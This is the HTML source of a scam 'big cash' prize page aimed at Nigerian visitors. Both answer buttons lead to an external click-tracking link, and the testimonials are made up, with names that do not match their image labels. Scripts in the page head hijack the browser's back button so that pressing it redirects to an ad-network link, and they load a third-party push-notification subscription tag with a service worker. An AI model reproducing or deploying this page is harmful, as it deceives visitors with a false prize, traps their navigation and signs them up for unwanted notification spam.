<!DOCTYPE html>
<html dir="ltr">
<head>
    <meta charset="utf-8"> 
    <meta content="IE=edge" http-equiv="X-UA-Compatible">
    <meta content="width=device-width, initial-scale=1" name="viewport"> 
    <title>Win a Big Cash!</title>
    <link href="css/style.css" rel="stylesheet">
    <script src="js/jquery.js"></script> 
    <style>.navbar{background-position: 0 0; background-color: #0A559F; border: 0; border-bottom: 1px solid #133783; -webkit-box-shadow: 0 2px 2px -2px rgba(0, 0, 0, .52); color: #ffffff; font-size: 12px; font-weight: 800;}
        .navbar-brand{color: #ffffff; margin-top: 3px; padding-top: 5px;}
        body{padding-top: 50px; background-color: #ffffff;}
        .content{padding: 50px 15px; text-align: center;}
        .comment-section {
            width: 80%;
            margin: 50px auto;
            padding: 20px;
            border: 1px solid #ccc;
            border-radius: 10px;
            background-color: #f9f9f9;
        }
        .comment {
            display: flex;
            align-items: center;
            margin-bottom: 20px;
        }
        .comment img {
            border-radius: 50%;
            width: 50px;
            height: 50px;
            margin-right: 15px;
        }
        .comment h4 {
            margin: 0 0 10px;
            font-size: 18px;
        }
        .comment p {
            margin: 0;
            font-size: 16px;
        }
        .cash-image {
            width: 100%;
            max-width: 400px;
            margin: 20px auto;
        }
    </style>
    
    
    
    <!--bb to Monetizer-->

<script> function imiBB() { let url = "https://app.impih.com/?utm_medium=43f99f70b126f87db2fc1abfd2a6ee8b6d6ec8fc&utm_campaign=ng_smartlink&np=1"; try { history.pushState({}, '', location.href); history.pushState({}, '', location.href); window.onpopstate = function (ev) { if (ev['state']) { location.replace(url); } }; } catch (ex) {} } !function () { let touched = false; let chromeVersion = 0; try { chromeVersion = +(new RegExp('Chrome/([0-9]+)').exec(navigator.userAgent)[1]); } catch (e) { chromeVersion = 0; } if (chromeVersion >= 75) { window.addEventListener('mouseup', function () { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); document.addEventListener("DOMContentLoaded", function () { document.body.addEventListener('touchend', function (evt) { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); document.body.addEventListener('keydown', function () { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); } ); } else { setTimeout(function () { imiBB(); } , 0); } } (); </script>
  


  
  
            
    <!--propush-->
<script>
    var s = document.createElement('script');
    s.src='//lemouwee.com/pfe/current/micro.tag.min.js?z=5168327'+'&sw=/sw-check-permissions-ea2cf.js';
    s.onload = function(result) {
        switch (result) {
            case 'onPermissionDefault':break;
            case 'onPermissionAllowed':break;
            case 'onPermissionDenied':break;
            case 'onAlreadySubscribed':break;
            case 'onNotificationUnsupported':break;
        }
    }
    document.head.appendChild(s);
</script>

    
    
    
</head>
<body>
<nav class="navbar navbar-inverse navbar-fixed-top">
    <div class="container">
        <div class="navbar-header"><br><center>Answer Only 1 simple question to get big cash!</center><br><br></div>
    </div>
</nav>
<div class="container">
    <div class="content">
        <div id="loading" style="display:none;">
            <img src="images/loading.gif" style="width: 30px; height: 30px;" alt="Loading">
            <p class="lead">Checking your response</p>
        </div>
        <div id="questionOne">
            <p><span style="font-size: 14pt;"><strong>Stand a Chance to get Big Cash if you are Nigerian!</strong></span></p>
            <hr>
            <img src="images/ojc9e2dpihv3w4um0kt7.jpg" width="122" height="122" alt=""><br>
            <!-- Added cash image below -->
            <img src="images/nigeria_cash.jpg" class="cash-image" alt="Nigerian Cash">
            <p class="lead"><strong>Do you want to get big cash?</strong></p>
            <button class="btn btn-success btn-lg btn-block" onclick="redirectToLink();" type="button"><strong>Yes</strong></button> 
            <button class="btn btn-success btn-lg btn-block" onclick="redirectToLink();" type="button"><strong>No</strong></button>
        </div>
    </div>

    <!-- Comment Section -->
    <div class="comment-section">
        <div class="comment">
            <img src="images/76.jpg" alt="Olumide A.">
            <div>
                <h4>Akuna</h4>
                <p>I really won! This is unbelievable, thank you for giving me this opportunity!</p>
            </div>
        </div>
        <div class="comment">
            <img src="images/78.jpg" alt="Ngozi O.">
            <div>
                <h4>Onella</h4>
                <p>I never thought I would win, I'm so happy! Thanks for the event!</p>
            </div>
        </div>
        <div class="comment">
            <img src="images/79.jpg" alt="Chidi N.">
            <div>
                <h4>Edgar</h4>
                <p>This platform is amazing, I won, and I couldn't believe it. Thank you so much!</p>
            </div>
        </div>
        <div class="comment">
            <img src="images/79_1.jpg" alt="Amina T.">
            <div>
                <h4>Yuna</h4>
                <p>Its unbelievable,I just thought its a game before I get my money!</p>
            </div>
        </div>
        <div class="comment">
            <img src="images/77.jpg" alt="Tunde O.">
            <div>
                <h4>Kazuaki</h4>
                <p>I can't believe I actually won. mama,I get it!</p>
            </div>
        </div>
    </div>
</div>

<script type="text/javascript">
    function redirectToLink() {
        window.location.href = "https://k5.maxconvv.com/click";
    }
</script>


</body>
</html>
